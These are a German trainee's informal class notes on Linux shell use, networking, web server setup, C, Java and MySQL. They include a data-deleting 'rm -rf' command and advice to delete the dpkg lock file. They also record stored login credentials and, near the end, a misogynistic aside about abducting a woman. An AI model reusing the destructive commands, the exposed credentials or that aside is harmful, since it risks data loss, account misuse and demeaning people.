Chmod a+r+w+x: Allen Schreibrechte geben. Aber, natürlich kann man auch mit chmod o+w w2/altar auch nur der ganzen Gruppe Schreibrechte geben. Ls -R cat >> /tmp/x = hänge an Datei an. History | head = erste 10 Befehle history | head -n 22 = auf die Zeile genau history | tail -n 13 >> /tmp/x = inhalt von history anhängen rm -rf /verzeichnis = verzeichnis löschen tail -f /var/log/apache2/*.log = im access-, oder error.log des apache-servers nachsehen, zeigt inhalt aller dateien an die mit log enden.

7.6.2016: Programm mit Texteditor schreiben, Shell-Skripte, for-Schleife mit Ingo Droß

Editoren: vim, emacs, nano, joe .. bashscript: bash bla.sh *.sh = shell-scripts. shift+ctrl+t = Reiter in Konsole chmod a+x bauhaus1.sh = allen Usern Rechte.

If [[ -d haus ]]; then -f (file) fi Das ist ein Block.

Variablenzuweisung.. HAUS = „haus“ echo $haus Man kann Vorschleifen verschachteln.

Fisicloud/clipboard = script kann man lokal abspeichern.

Verschlüsselung: one-way mit hashwerten. Diese form der Verschlüsselung kam mit leistungsfähigeren Grafikkarten raus. less-nd = pager, bis zum Ende einer Datei space head -n 12 /etc/passwd | tail -n2, oder -n3 .. jeweilige Zeilen werden ausgegeben grep max /etc/passwd = Name in /etc/passwd finden grep /etc/passwd | wc = wordcount wc -l /etc/passwd wc -t /etc/passwd | cut -d ` ` -f 1 cut -d „i“ -f 1,3,4 /etc/passwd user-id und mehr grep ingo apache.txt | wc -l= wie oft ingo in apache.txt vorkommt.

Wc -l = wie viele Zeilen ein doc hat.

Und dann ging es mit cut weiter, wo ich nicht mehr richtig mitgekommen war .. history | head → erste zehn Befehle .. und weitere ….

8.6.2016 VPN, Dig, Lspci, Nameserver ändern mit Ingo Droß : export https_proxy=“https://cimi-proxy“; ping 192.168.0.254

Dann wurde uns ein VPN erklärt route add -host 188.68.50.27 gw 192.168.111.111 route add -host 8.8.8.8 gw 192.168.111.111 dig@ 8.8.8.8 taz.de = damit kriegt man die Ip‘s von den Servern raus.

Und dann ging‘s weiter mit route durchs dsl-modem legen, für mich selbst. Scp wurde vorgeschlagen. Und andere linux-kniffe z.b. wieviel prozesse er gemacht hat.

Top = Betriebssystem in Echtzeit zusehen Wie soll das gehen? In der Konsole als root top eingeben (top ist der task-manager für Linux) wenn programm läuft: „k“ für kill eingeben, dann erscheint der programminterne Prompt. dann die 2936 – ziffernfolge, die ganz am Anfang eines Prozesses steht, eingeben dann „9“ drücken um den Prozess anzuschießen. lsof | grep home | grep chrom | wc -l allein 25000 prozesse beim Browser bei mir geht es nicht, irgendwas ist falsch .. .

(Dann folgen irgendwelche Netzwerkzeichnungen, die ich noch irgendwie mitschreiben konnte, bevor ingo während deines unterrichts-marathons sie wieder weggewischt hatte .. ).

USB in virtual box kriegen. Unter windows: extension-pack installieren, um usb‘s in das virtuelle system zu bekommen.

Eine bis heute ungelöste Frage: IP vom DSL-Modem anpingbar??

Resourcen: cpu: cat /proc/cpuinfo lspci = zeigt alle Hardware an lshw = ist da genauer lspci | grep -i vga dmesg = kernel-meldungen df -h = welche platten gerade gemountet sind.

Grafik mit boot-Loader ?? fdisk /dev/sdc

Dann ging es wahrscheinlich um eine Filezilla-Installation.

Dann hatte ich ein dns-server-problem, woher auch immer. Ich konnte es lösen, indem ich mittels dem Editor nano nano /etc/resolv.conf dort nameserver 8.8.8.8 eingetragen hatte.

9.6.2016 Linux: Mit Grep suchen mit Ingo Droß export http_proxy=“http://192.168.0.254:3128“; route unter windows cmd (mit admin-rechten) setzen: route add 188.68.50.27 192.168.111.111 wenn man /var/lib/dpkg/lock, diese datei lock löscht, geht das upgrade und man kann sich den webtraffic aus vergangenen zeiten ansehen grep win[a-z]ows apache.log und man kann mittels grep ip-adressen raus greifen copy2clipboard ctrl + shift + c copy from clipboard ctrl + shift + v

Dann ging‘s um Script erstellen, das automatisierte vhost-erstellen.

Nochmal was zu port-weiterleitung über die fritzbox. IP der fritzbox immer noch nicht raus gefunden..

Dann sind hier kreuz und quer Notizen, wo ich mich bemühte, das Internet zu verstehen .. per ssh in die fisicloud: ssh [email protected] -p 22220

13.6. Vhost Fortsetzung (phpmyadmin, wiki und piwik einrichten) phpmyadmin installieren das hatte ingo mit uns manuell gemacht. Weil aber das alles mir zu erklären zu kompliziert gewesen wäre, machte ich: apt install phpmyadmin

Später hatte ich beim lamp nicht jedes einzelne Paket installiert, sondern bei einem frischen ubuntu zu Hause den langen Befehl für alle lamp-dienste (apache2, php7, mysqli) vom online-tutorial rein kopiert. dann kurze wiederholung von mysql mit table Telefonnummern.

14.6. Osi-Schichtenmodell mit Markus - Netzwerkkomponenten verschiedener Hersteller wollen miteinander kommunizieren. Ethernet ist basis für tcp/ip-protokolle, hat token-ring verdrängt.

Wake on lan = netzwerkkarte fährt rechner hoch. Prüfziffern: Modulo 10: ethernet-frame = byte

Beim datenframe, im ethernet, mit quell- und zielmac-adresse: präambeln= synchronisieren der hertz-frequenz telnet: vorgänger vom ssh

Markus merkte vor, dass wir Cortana installieren werden und windows 10 härten.

Was passiert eigentlich, wenn ich später kein praktikum zum startpunkt der praktika bekommen sollte ??

Windows 10 kann sich an MAC-Adressen der Hardware kleben! DHC-Prüfsumme arpanet = mail-box-protocol ist der Vorfahre.

Arp-spoofing.

Dann gab‘s eine Gruppenarbeit Protokolle (mit mathias) über SMTP.

Dann Eigenarbeit Hardware, 5-6-Seiten voll, um beim Lüfterprojekt, dass benotet worden ist, besser durch zu blicken (kann man vieles vielleicht noch hier rein schreiben). Real bench, cpu – z. Flachbettscanner kopiergerät hat verschiedene Optiken und ist immer genauer in scannen, anstelle eines Flachbettscanners. Virtual clone drive

15.6.2016 Grafik: Speichergröße berechnen, wenn dpi gegeben ist.

Gegeben: DIN A4, 72 dpi, 24 bit Farbtiefe. Gesucht: Bildpunkte, Gesamtgröße der erzeugten Datei über Scanner.

Dpi = DOTTES(Rotz) per Inch!

DIN A4 = 21cm * 29,7 cm, 1 inch = 2,54 cm (72 dpi * 21cm * 2,54cm) * (72dpi * 29,7cm * 2,54cm) = 501156 Dottes (Bildpunkte). Um unkomprimierte Speichergröße zu erhalten: 501156 Dottes * 24 bit = 12027744bit : 8 = 1503468 Byte 1503468 : 1024² = 1,433MB Komprimierung: 1,433MB : 8 = 0,179 MB

„Wenn wir den Mechanismus und die Motive des Gruppendenkens verstehen, wird es möglich sein, die Massen, ohne deren Wissen, nach unserem Willen zu kontrollieren und zu steuern.“

Der Proxy der Cimdata ist 192.168.0.254, Port 3128

18.6.2016 Wieder Subnetzmasken Wenn an der IP eine 16 klebt: 192.168.0.0/16

16 ist die Anzahl vom Bit des Netzpräfixes. Er kann bis zu 32 Bit haben. Diese 16 Bit werden als Einser im Binärcode der Subnetzmaske dargestellt. Diese Subnetzmaske ist nur 16 Bit groß.

Ein Bit ermöglicht zwei Zustände: An und aus. Acht Bit Zweihundert-sechsundfünfzig Zustände.

Allerdings definiert sich eine Subnetzmaske in vier Acht-Bit-Schritten, die für sich stehen und jeder dieser acht Bit kann bis zu 256 Zustände enthalten.

Subnetzmasken kann man mit der Ortsvorwahl in der Telefonie vergleichen. Bis zu 254 Host sind möglich, weil die erste Stelle der IP für den Server selbst stehen und 255 ist der Broadcast. ??

Ich vermute mal, dass jede Klasse eine eigene Maske hat ..

Dann mussten wir wahrscheinlich die Dokumentation vom Lüfterprojekt abgeben (meine Papiere sind unvollzählig, ich müsste auf Server nach schauen, wo ich das Dokument reingelegt hatte, wo es zur Bewertung abgegeben wurde).

(Einwurf vom 5.2.: Herr Leu fragen, ab Dienstag)

Dann habe ich eine Programmablaufplan zum ARP-Protokoll. Am ende kommt da ein Ethernetframe raus – wieso? Ein ethenetframe hat eine quell-und-ziel-mac-adresse, aber im Programmablaufplan (Auch Flussdiagramm?) wird die Zuordnung von zwei MAC-Adressen nicht beschrieben.

Ethernet = Grundlage CSMA/CD-Protokoll Es gibt hybride Kernel, die Eigenschaften von monolitischen Kerneln und Mikrokerneln vereinen!

20.6.2016 VHOST und Wiki

Erstmal hatten wir unter /etc/hosts 127.0.0.1 wiki erstellt, wir hatten das Script automatisiert laufen lassen. Bei mir zu Hause funktionierte es nicht ganz. ./mkVhost.sh 127.0.0.1 wiki

Dann einen Ping unter dem Namen den man neu angelegt hatte (ping wiki).

Bei mir heißt diese Datei „mkVHost.sh“.

„Vom mkVHost: in das Verzeichnis /etc/apache2/sites-enabled ./mkVHost.sh ip name

Konkret: ./mkVHost.sh 192.168.0.1 neuvhost

 Mediawiki Download  dann entpacken: „tar -xvf zipfile.tar.gz“  DB User anlegen user: bla; pw: bla

in der conf-Datei (Vhost-Einrichtungs-Kenntnisse vorrausgesetzt) wird folgendes beachtet:

 In die 002-wiki.conf – Datei, schreibt man:  ServerName wiki ServerAdmin webmaster@localhost DocumentRoot /var/www/wiki

 Das wiki ist im verzeichnis /var/www/html/mediawiki-1.26.3 aber man muss im Verzeichnis /var/www einen Link setzen. Man setzt diesen Link an die Stelle, wo die conf-Datei des vhostes hinzeigt. In meinem Falle auf /var/www. Das geht so:

ln -s html/mediawiki-1.26.3/ wiki  Dann ruft man wiki im Browser auf (ggf. Proxy deaktivieren, oder ip + Servername in der Freigabe des Proxys hinzufügen). Im Gegensatz zum üblichen Vhost muss im /var/www kein neuer Ordner angelegt werden. Es reicht, dass der Link an die Stelle zeigt, wo die conf auch hinzeigt.

Wiki = user: bla ; pw: blablabla wohin mit localsettings-datei, nach /www/wiki

Im Wiki gibt’s noch die Möglichkeit, einen User anzulegen.

Ohne Datum Google Analytics kann man auch selber machen, Mit PIWIK mit Ingo Droß:

Piwik ist ein Websitetrackingtool;wie usen User eine Page; um die Effizienz einer Werbekampagne zu überprüfen. HAXE soll es auch dafür geben, oder?? 1. Piwik downloaden 2. mysql user piwik und datenbank piwik anlegen; password: blabla ./mkvhost.sh 182.168.0.1 Piwik man kann den vhost natürlich auch traditionell erstellen.

Piwik wird in var/www/ entpackt, mit unzip piwik chown www-data piwik -R (Userrechte ändern)

Jetzt heisst es plötzlich: Und auf sql einen user „piwik“ anlegen(ankegeln). Database-server = localhost login: piwik pw: blabla url: http://localhost/wiki Name: wiki Dann den js-code von piwik unter /var/www in den Header einer html-datei platzieren, oder einer neu erzeugten index.html – Datei platzieren.

Falls mir der Zugang zur Fisicloud abhanden kommt.

User: [email protected] port: 2222 PW: bla

Für phpmyadmin: user: max_bla pw: seitMonaten der fc-servername lautet: „localhost“

14-16 & 21-23.6.2016: Irgendwie fehlt hier die ganze Zeit, wo wir mit Markus das Lüfterprojekt gemacht hatten und das OSI Schichten Modell / Netzwerktopologien

27.6.2016: Projektbetreuung der Gruppenarbeiten zum Projekt Auftragsbearbeitung mit Herr Leu

28.6.2016: LinkedIn mit Ingo

Bevor mit Java richtig durch starteten, meldeten wir uns in LinkedIn an.

Vorname User: Helmut Nachname: Kamin email: [email protected] pw: Datamining

Zwischending: Was Dataminining ist? Ganz einfach: „Kurzerklärung: Unter Data Mining versteht man die Anwendung von Methoden und Algorithmen zur möglichst automatischen Extraktion empirischer Zusammenhänge zwischen Planungsobjekten, deren Daten in einer hierfür aufgebauten Datenbasis bereitgestellt werden.“

Das ist doch klar wie Kloßbrühe, man muss nur den nippel durch die lasche ziehen und den ultrafrequenzwandler mit den minusresonanzkoppler melotinieren .. das weiß doch jedes Kind!

Sie müssen das noch mit der kleinen kurbel nach oben drehen, dann erscheint dort sofort ein pfeil, dann drücken sie drauf, dann geht die Tube auf. Mike Krüger mit einer Akustikgitarre.

Dieses Linkedin da steht am himmelstor, dass man den nippel durch die lasche ziehen muss, qwasi, man muss Telefonnummer angeben, wie bei gmail und facebook und wird dann totalüberwacht .. . Aber LinkedLn ist gut für Jobsuche.

Wenn ich wirklich meinen eigenen linkedln-account nutzen will, brauche ich ein zweithandy.

Doch provisorisch kann ich linkedln nutzen.

Ohne Datum c-programming mit Ingo Droß (irgendwann in der Zeit, wo im Java aber Klassenbuch drin steht):

Wikipedia: „C ist eine imperative Programmiersprache, die der Informatiker Dennis Ritchie [2] in den frühen 1970er Jahren an den Bell Laboratories für die Systemprogrammierung des Betriebssystems Unix entwickelte. Seitdem ist sie auf vielen Computersystemen verbreitet.“ apt install build-essential gdb c quellcode kommt erst durch den compiler, dann durch den linker. Also, compiler + linker + make ..

Was ich mal wieder während Ingos schnellen Erklären als Fragment notiert hatte: Im Preprozessor (vor dem Kompilieren); da könnten Makros drin stehende #include

Parsing Tokens → as → compiliert

Daneben eine Zeichnung, die einen Prozessor darstellen sollen, sowie die Skizze eines Stacks, mit Kommentaren, wie:

„Debugger – nimmt Käfer raus“. „FiFo = FirstinFirstout“ „Das Register der CPU ist super schmal.“

Exploits sind Befehle, die man in bestehenden Code einbettet.

Und das unterste Element eines Stacks wird als letztes aufgerufen.

„Dann gibt‘s shendel“

Mithilfe von Stacks lassen sich Terme und Syntaxen auf die richtige Verschachtelung überprüfen.

Befehle, mit denen man in den stack schreibt: push. Lesen: pop.

Dann übten wir c-Ausgaben.

Eriedel.info/info/c-prog/cpl1.html

Unix war ursprünglich als Assembler geschrieben, wurde dann in c umgeschrieben. Deswegen ging Ingo hier so stark auf die Hardware ein, weil assember sehr hardwarenah sind. Trotzdem sind mir die konkreten Zusammenhänge nicht klar. Vielleicht ein erleuchtendes Tutorial dazu.

# include int main () { printf(„Hallo“); return 42; } int und return 42 gehören zusammen .

42 is the answer to life, the universe, and everything ← siebziger-kult !!!

Das „hallo“ ist ein Parameter an die Funktion.

Dann geht es durch den compiler, mit gcc first.c -o first .. wird dann in das Maschinenfile first unbenannt, dann mit ./first ausführen ! Ist das ein „linken“ ?? und das „make“? root@deb-saiyajin:~# nano hallo.c (dort packte ich den c-code rein) root@deb-saiyajin:~# gcc hallo.c -o pop root@deb-saiyajin:~# ./pop

.. und das wars auch schon! Das Betriebssystem weiß, dass „main“ eine Funktion ist. Wenn sie aufhört, gibt sie was zurück (interger wert).

Die erste Instanz in Übersetzung eines c-programms ist der Präprozessor.

Dann ging es wieder um integer-progrämmchen.

Und mit „if – else – for ..“ - Schleifen, als Steigerungsform. Und am Schluss steht dann: „Wenn man das alles erarbeitet und verstanden hat, hat man 80% vom programmieren verstanden“ - soso!

Operatoren: + - * / = = = + = < > und noch einige mehr.

29.6.2016 c: Präprozessor mit Anweisungen füttern = dafür ist stdio.h zuständig.

Void = Ereignistyp von Funktionen für leere Parameterlisten von Funktionen zur Kennzeichnung von Zeigern.

Scope = Sichtbarkeit

Decorator = (Ich brauche nicht die Grundlagen zu verändern, sondern muss nur schauen, dass der Decorator drauf pappt).

Pattern = wie kann ich Software so konstruieren, dass das Framework auf zukünftige PC‘s angepasst ist.

JDK: eine Sprache, viele VM. NET: viele Sprachen, eine VM (Windows OP) unser Ziel ist dabei Java Bytecode „(unter dieser Schicht läuft sie dann)“. Und es gibt javadoc. Javac = compiler java = Bytecode

1.7. Netzwerke, wieder Subnetzmasken, Netzstrukturplan

Aber nur kurz. Ich werde einfach mal alles zusammen fassen (hier weiter machen). Dann ein erster Netzstrukturplan, wo man vom Extranet über das Internet in das Intranet einer Firma kommt, die einen RAS und einen Radius-Server haben. Radius, der nur Datanbanken kennt, ist AAA = Authentification, Authorization und Accounting.

Dann sollten wir unterscheiden, wer von beidem, client und server listen, bind, accept .. macht.

Dann steht hier, dass das ARP IP‘s in mac-adressen umwandelt. Die Hardwareadressen werden in Tabellen hinterlegt.

„Stateful Inspection Firewall“ Auf welcher Schicht des OSI-Modells arbeitet sie? Drei und vier glaub ich .. und was ist überhaupt eine stateful inspection firewall? Fritzbox ist: Switch, Modem, Router .. DHCP-Server möglicherweise auch.

„Topmodelle wie die FritzBox 7490 vereinen WLAN-Router, Telefonanlage und DECT-Schnurlosbasis in einem Gerät.“ Die Berliner Firma AVM stellt die Fritzboxen her.

5.7. 2016 Java: Eclipse installieren unter Linux

Root sein. Unter /opt mkdir eclipse; dort das eclipse.tar.gz rein, entpacken. Userrechte ändern: chown -R bla:bla /opt/eclipse

Nicht ohne Grund werden dem Installordner Userrechte gegeben !!

Dann wird man normaler User. Den installer starten: /opt/eclipse/eclipse-installer$ ./eclipse-installer /root/eclipse ./eclipse-installer; ll ; ls-lsa ; /usr/lib .. find /usr -name eclipse eclipse starten unter: cd /home/bla/eclipse/java-neon/eclipse ; ./eclipse

(Update vom 27.1.2017: Eclipse finde ich unter: /root/eclipse/java-neon/eclipse)

Workspace: /home/bla/workspace find /usr -name eclipse cd /home/bla/eclipse.. strg + space +enter = Autovervollständigen (space los lassen) ctrl + s = abspeichern ctrl + F11= übersetzen (compilieren und ausführen) shift + ctrl + c = Ganzer markierter Code nicht ausführen. Wieder drücken macht es weg!

Extrakt, refraktor, navigate Help → check for updates; install new software

Bei Jave heißen Funktionen jetzt Methoden (member functions)!! Aber eigentlich sind sie funktionen.

Methoden = innerhalb der klasse.

Public = von außen zu sehen. … unter Anderem kann die IDE für uns Dokumentationen erstellen.Javadoc-kommentare gehen so: /** .. */ und unterscheiden sich von den gewöhnlichen Kommentarzeilen. Slackware = ältere linux-distro.

Refraktor: Auf das zu ändernde Wort im Code klicken, es markieren, dann shift +alt+r, dann das Wort ändern.

Statische klasse; getters und setters;

Antares Klassenserver: 192.168.22.1 Standard-Port: 3128

Membervariablen

Lauter Ausdrucke mit Java-Code, vom Ingo, weil viele mit dem Abtippen nicht hinterher gekommen waren! z.B. DreiEck.java = camel cases. Ein boolean ist ein datentyp und der kennt nur ja oder nein!

Dann eine kleine for-schleife, die ich aber nicht durchblickte.. Eine Schleife ist eine Kontrollstruktur in Programmiersprachen (Wikipedia). Endlosschleifen sollen in der Programmierung vermieden werden (Abstürze)! Schleifentypen: annehmende und abweisende Schleife.

Dann steht hier der Befehl shift + alt + m

Wieder Kopien vom Code von Ingo, versehen u.A. mit „doc kommentar“.

Mit Jacadoc kann man methoddetails betrachten.

..ganz viel anderen zeug..

Zu den Datentypen (boolean, char) gibt es Klassen.

Schleifen ermöglichen Programmanweisungen mehrfach hintereinander zu wiederholen. Java hat die for, die while und die do-while – schleife.

For wird immer dann benutzt, wenn man die Anzahl der Vorläufe schon vorher kennt = wirklich ??

Java-Operators zu finden unter: www.cafeaulait.org/course/week2/03.html

Schleifen schleifen in java googlen

..zeugs.. schiften in die cpu → wie war das nochmal ??

..zeugs.. mit scanner int einlesen und bitmuster anzeigen. Zufallszahlen generieren und bitmuster anzeigen. Double d = math.random();

Shiften – das „Und“ println ist eine Methode.

Operatoren sind arithmetisch, logisch und relational.

Parameterliste: String [] args System.out.println(4); parameter int r = (int) ((Math.random()*10) + 10); = alles in einer Zeile – und was macht man dann damit?

Ohne Datum Java: Hintergrundinformationen mit dem meta-tag ermitteln

Themen: Mögliche Einträge: Attribute zum -Tag im head-teil von websiten finden sich meist mehrere Einträge, die das meta-tag nutzen. Diese Angaben werden von Suchmaschinen ausgewertet; Autorenangabe, Länderkennung lÄÄÄnder – bender !! und Stichworteinträge möglich. Der Browser wird spezifisch auf die folgende Seite vorbereitet. Damit wächst sicherheit, das ne darstellungsseite nicht crass vom entwurf abweicht.

Bedeutungen des name bzw. http-equiv-Attributs: audience = an wem wendet sich die Seite.. zielgruppenunterwanderung, ist ja wie beim Marketing! Autoren content-type = Jetzt wird es künstlerisch. MIME-Typen (pantoMIME?) sind anzugeben z.B. Content=“text/html; charset=iso-8859-1“ description = Text wird von vielen Suchmaschinen für die trefferanzeige genutzt keywords = Schüsselwörter, die von vielen Sprachmaschinen ausgewertet werden robots = spricht Suchroboter an

ReadTextFile.java lese hier gerade: „import java.net.MalformedURLException“ Man sollte sich mal eine Programmbibliothek ausdenken, die „import java.net.MalfunctionURLException“ heißt, also importiere von der java-net-Bibliothek ausnahmsweise eine gestörte URL ! Hey, ihr ganzen Fehler, kommt rein, ich mache eine Ausnahme! Aber, so schlimm ist es gar nicht, wenn am Anfang jedes Java-Dokuments zusätzlich: import java.io.FileNotFoundException; steht! Hey, ihr ganzen nicht gefundenen Verzeichnisse, ich mache eine Ausnahme, kommt rein!

Und „Stringsi“ ist auch immer dabei: Public static void main(string[] args) { .. usw. ← hier muss sich stringsi aber zusammenreißen und darf nur „string“ heißen, sonst ärgert sich die ganze Java-klasse und wird zur Prüfung von Mr. Compiler nicht zugelassen !! Erstens dachte ich, er ist eine Klasse, jetzt aber ein Datentyp??

Zitat: “Der Datentyp String ist in Java kein einfacher Datentyp wie etwa int oder double oder boolean, sondern eine Klasse. Eine Variable vom Typ String enthält daher nicht den String selbst, sondern sie enthält einen Verweis auf ein Objekt der Klasse String. ”

String r, s, t; r="abc"; s="de"; t=r+s; // Verkettung von r und s System.out.println(t); // Ergebnis: "abcde"

Aber eigentlich heißt string stringsi .. ich weiß, ich personifiziere, ich vermenschliche tote Dinge, wie Wörter, dazu noch genormte Wörter aus Programmiersprachen! Ist aber witzig! Die „string“-Klasse bekommt bei mir „Charakter“! Ausgerechnet die aus der „unveränderlichen Zeichenkette“! Sie darf verschiedene Methoden zur Inspektion und Konvertierung aus anderen Datentypen zur Verfügung stellen, macht aber gerade bullshit und will sich lieber rosarot stringsi nennen! Stringsi – die erste transsexuelle Java-Klasse!

Zitat aus dem Javaforum: „main ist der Einstiegspunkt in Dein Programm. Irgendwo muss es ja losgehen. Die Methode muss public sein, weil eine unsichtbare Methode schlecht aufgerufen werden könnte. Sie muss static sein, da es zu Beginn noch keine Objekte von der Klasse geben kann (wer hätte ein solches Objekt auch erstellen sollen?). Sie ist void, weil sie nichts zurückliefert... das ist in anderen Programmiersprachen wie C und C++ nicht so. args ist ein Array von Referenzen auf Strings, welches die Kommandozeilenparameter enthält.“ Schon wieder der Refraktor, der alte Traktor: Markieren, shift+alt+r, dann wert ändern. strg+space+enter auto-vervollständigen shift+ctrl+c ganzer compilierter code nicht ausführen lastPos = htmlContent.lastIngo*OE(„href=\““) .. und jetzt ?? state machine = endlicher Automat.

Enum = steht für Aufzählungen, seit java 7.

Aufzählungen sind statisch.

“Eine Statische Bewegung wäre mir jetzt nicht bekannt .. statisch heißt nämlich quasi unbewegt, gleichbleibend, konstant. Dynamisch ist dagegen veränderlich”

Dann erstellten wir Verknüpfungen mit Java, vermutlich. Mit public class B extends A { = erbt alles von A.

Was heißt „parsen“? Parser = to parse = analysieren. Was analysiert er?

11.7.2016 Java: Java ist eher wie Grammatiklernen

Vererbungen in Java. Klassen können von mehreren Klassen erben, dazu viele Zeichnungen. Wo?

In Java gibt es Interfaces. Verspricht, es gibt bestimmte Membervariablen. In Java kann eine Klasse beliebig viele Interfaces machen.

13.7. Java: Jframe

Graphics2g2=myFrame.getGraphics Was ist das? Zitat: “Die Schnittstelle, um graphische Objekte wie Shapes, oder aber auch Bilder zu zeichnen, ist in Java das Graphics-Objekt. Dieses ist seit der Version 1.0 im JDK enthalten, mit der Version 1.2 ist das Graphics2D Objekt hinzugefügt worden.”

Mit Jframe konnte ich for-schleifen grafisch darstellen.

Programm Junit= stellt Jbutton, Jlabel, Jtext Field und JtextArea. Schlagwörter: MouseListener, ActionListener, MouseClicked .. event action listener sucht aus action Performed() GUI: Farbe, Punkte, Linie, Kreise, Rechteck Grafikobjekte = Teil der Objektorientierung drawline(x1,y1,x2,y2). Es gibt keinen drawpoint. Was man in Jframe als Punkte zu sehen glaubt, sind in Wirklichkeit Linien!

Im Listener die Methode MouseClicked ist. Mouse Clicked() { int x = e.getx(); y = e.gety(); drawline(x,y,x,y); maFrame.getGraphics().drawLine( .. ); Asynchrone Datenübertragung = ein ungefährer Gleichlauf zwischen Sender und Empfänger wird nur für die Dauer eines Zeichens hergestellt und aufrechtgehalten.

Grafiktyp holen public void kreise () { Graphics g = myFrame.getGraphics; int pl = 200, g.setColor(color gray); g.drawOval(p1,P2,d,d);

Und dann kommt da ein Kreis raus?

Dann versuchte Ingo mir noch mal das Shiften in die CPU zu erklären. Aber ich habe es immer noch nicht verstanden !

14.7. Programming allgemein: Programmablaufplan erstellen

Für die Benutzerverwaltung sollen Passswörter nach folgendem Prinzip erstellt werden: Das Passwort besteht aus acht zufällig gewählten Zeichen: groß, kleinbuchstaben, ziffern od. Kleinbuchstaben. a) Problemlösung erstellen: Pseudocode, Struktogramm oder Programmablaufplan Funktionen zur Verfügung: rand(127) erzeugt einen zufälligen Integerwert im Bereich 0 -127 char (Zahl) wandelt eine Zahl in das entsprechende Ascii-Zeichen um

Start – Vorschleife – Aufruf der Ascii-Tabelle – Wert kleiner als 33, oder genau 127 - Acht mal wiederholen von Random – Acht Ergebnisse: Passwort gesetzt b) Aufgabe der Funktionen in Programmen: Eine Funktion ist eine Ansammlung von Anweisungen, unter welcher Programme starten. Im Gegensatz zu Operatoren und Variablen können mit ihnen Anweisungen getrennt in Pakete gelegt werden und übersichtlicher gestaltet werden. Sie kann öfter angelegt werden. c) Zwei Maßnahmen neben Passwortlänge, mit denen Sicherheit von PW‘s erhöht: Sonderzeichen (wie $,?); Groß- und Kleinbuchstaben abwechselnd. d) Neben Benutzername und PW werden digital. Zertifikate zur Authent. verwendet. Vier Bestandteile des digitalen Zertifikats: - Versionsnummer - Seriennummer - Digitale Signatur - Zertifikatalgorhythmus

Druckaufträge über VPN: Cimi Drucker: 192.168.22.5

Konvektion (von lateinisch convectum ‚mitgetragen', auch Wärmemitführung) ist das Mitführen durch ein strömendes Fluid.

Dann waren Sommerferien 15.8.2016 SQL mit Ingo

- Schlüsselwort: Constraint - Wie geht Backup der Datenbank? - Mögliche DB-Cluster - noSQL(inEmerson-Cloud) - Password Trigger - Posgres SL = andere SQL-Datenbank - kommerzielle Datenbank: WinSQL nutzbar evtl.

Constraint: “Mit Constraints (deutsch „Zwangsbedingungen“) werden in diversen Programmiersprachen bzw. Datenbanken Bedingungen definiert, die zwingend vom Wert einer Variablen erfüllt werden müssen, damit der Wert ins System übernommen werden kann. ”

Insert → neuen Datensatz anlegen select → auswählen eines Datensatzes; JOIN verbinden von Tabellen..

Ein Table kann Texte mit bis zu 255 Buchstaben beherbergen; dann braucht es einen „Longtext“.

Die Datentypen im „Geo“ sind Latitude, Longtitude .. schwedisch: jage er tysk = ich bin deutsch

Tunnel zur fc erstellen: 192.168.22.1/dokuwiki/fisi/linux/sshtunnel

..hier ..

Dann muss ich im Browser unter „Advanced“ /Network/settings unter „SOCKS Host“ den Port nennen den ich beim Erstellen angegeben hatte.

Apt install mysql-server * = password neu setzen Neues Password: blabla

CREATE USER ‚meinname‘@‘localhost‘ IDENTIFIED BY ‚mein Passwd‘; GRANT ALL PRIVILEGES ON *.* TO ‚admin‘@‘localhost‘ WITH GRANT OPTION; GRANT RELOAD, PROCESS ON *.* TO ‚admin‘@‘localhost‘ ; (oder [email protected]) SELECT * FROM user; quit dann kann man sich mit dem neu erstellten User einloggen .. SELECT * FROM user; ← zeigt Tabelle mit allen Privilegien des Nutzers. Mysql > FLUSH PRIVILEGES; quit less .mysql_history oder grep concat /root/.mysql_history grep wunschbefehl /root/.mysql_history der wird dann im code raus gesucht.

Ps fax | grep mysql netstat -apne |grep mysql = Netzwerkverbindung /etc/mysql nano my.cnf = confi der Datenbank prozess suchen = ps

Eine Datenbank ist remote erreichbar master-slave-Datenbanken

Eine Datenbank kann sich auch an eine andere DB hängen, mittels IP-Angabe.. Eine Datenbank für alle Webserver = muss die IP angegeben werden Wenn man in der *.cnf den Port ändert, muss man ihn beim Anmelden mit -P explizit angeben (außerhalb von mysql).

Mysqladmin -p -u root create addressen ll /var/lib/mysql/addressen ← damit kann man die Tabellen sehen

Neue Tabellen und Telefonnummern: Es sollte nie ein numerischer Wert (integer) dafür angelegt werden, weil die Nullen am Anfang von Handynummern weg gekürzt werden könnten.

#! /bin/bash echo „erstelle DB:$1“; mysqladmin -p „bla“ -u arsch create $1; exit 0;

..also wieder ein Script zum automation von Processes .. erstelle DB + User + Passwd auch gut: ########## #! /bin/bash PASSWD = „bla“; USER = „arsch“; mysql -p$PASSWD -u$USER -e „SHOW DATABASES“; exit 0;

########## Ein Skript, das zeigt alle DB‘s an!

Es gibt drei Möglichkeiten, um an eine Frau zu kommen: 1. Ich baue mir eine 2. Ich züchte mir eine 3. Ich klaue mir eine Dritt genanntes wird wohl einfacher sein, aus der eu raus und dann spass haben! Prostituierte in Anspruch nehmen? Zu teuer, zu unpersönlich .. ich will in freier Natur mit dem Biest ringen und es „zähmen“ ! delimiter = src (Abgrenzer einzelner Elemente in Dateien) mysql -p$passwd -u$user -Ns -e“DESC user;“ mysql

Dieser Befehl funktioniert: mysql -p$PASSWD -u$USER -Ns -e "SHOW DATABASES";

Eine Fundgrube kann unter /bin/mysql angelegt werden (Ergänzung 5.2.2017: Fundgrube ist hier: /root/mysql-skripte# nano showDATABASE.sh )

-Ns = (verhindert optische Trennung der Tabellen). Mit ./showUser.sh|cut -f 1 zeigt Computer nur Namen an, aus MySQL. 16.8.2016 SQL: Tabellen verknüpfen und erweitern mit Ingo Droß

Löscht man einen Table, werden Abhängigkeiten in anderen Tables gelöscht.

Anstatt int, enum .. kann man auch Blob eingeben, für binäre datei, wie ein bild.. dann hatten wir das Anlegen von Tabellen mit auto_increment

Packe die Datenbank in eine Textdatei mit Namen t.sql: mysqldump -p -u root dbname > /tmp/t.sql es geht unter phpmyadmin auch, mit „exportieren“. Unter Javascript heißt es mögl. Asynchrones Request.

Wenn man als Programmierer, oder Systemtechniker arbeitet, verwendet man NAGIOS, oder CHINGA. Nagios: “Nagios bietet dazu eine Sammlung von Modulen zur Überwachung von Netzwerken, Hosts und speziellen Diensten sowie eine Web-Schnittstelle zum Abfragen der gesammelten Daten. ”

Dritte Normalform: “Die Dritte Normalform ist oft ausreichend, um die perfekte Balance aus Redundanz, Performance und Flexibilität für eine Datenbank zu gewährleisten.”

